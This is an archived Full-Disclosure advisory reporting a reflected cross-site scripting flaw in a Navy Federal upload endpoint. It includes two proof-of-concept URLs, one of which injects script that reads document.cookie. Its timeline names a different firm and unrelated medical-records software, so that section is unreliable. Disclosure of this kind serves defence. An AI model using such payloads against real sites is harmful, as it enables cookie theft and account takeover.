lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 17 Sep 2020 21:14:51 +0000
From: Juan Avila <javila@...hrocyber.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Navy Federal Reflective Cross Site Scripting (XSS)

Vendor
-------------------------------------------------
Navy Federal - (https://www.navyfederal.org/

Product
-------------------------------------------------
Front pubic facing application

Credit
-------------------------------------------------
Arthrocyber
http://arthrocyber.com/research/#finding_7

David Reyes

Vulnerability Summary
-------------------------------------------------
The endpoint sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain did not sanitize HTML characters. It was possible to pass HTML code which triggered an XSS.
Technical Details
-------------------------------------------------
The parameter "type" failed to properly sanitize HTML characters resulting in reflective XSS.

https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(%225-2-17--Reflective-Arthrocyber-XSS%22)%3C/script%3E

https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eß

Solution
-------------------------------------------------
Reference OWASP top 10.
https://owasp.org/www-community/attacks/xss/

Timeline
-------------------------------------------------
07 May 2019 - Adaptive Security Consulting discovered a series of vulnerabilities in medical records management and
search applications being considered by our client
September 2020 - Endpoint no longer appears to be vulnerable to XSS.


Juan Avila
Arthrocyber, LLC
Cell (682)238-7188


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists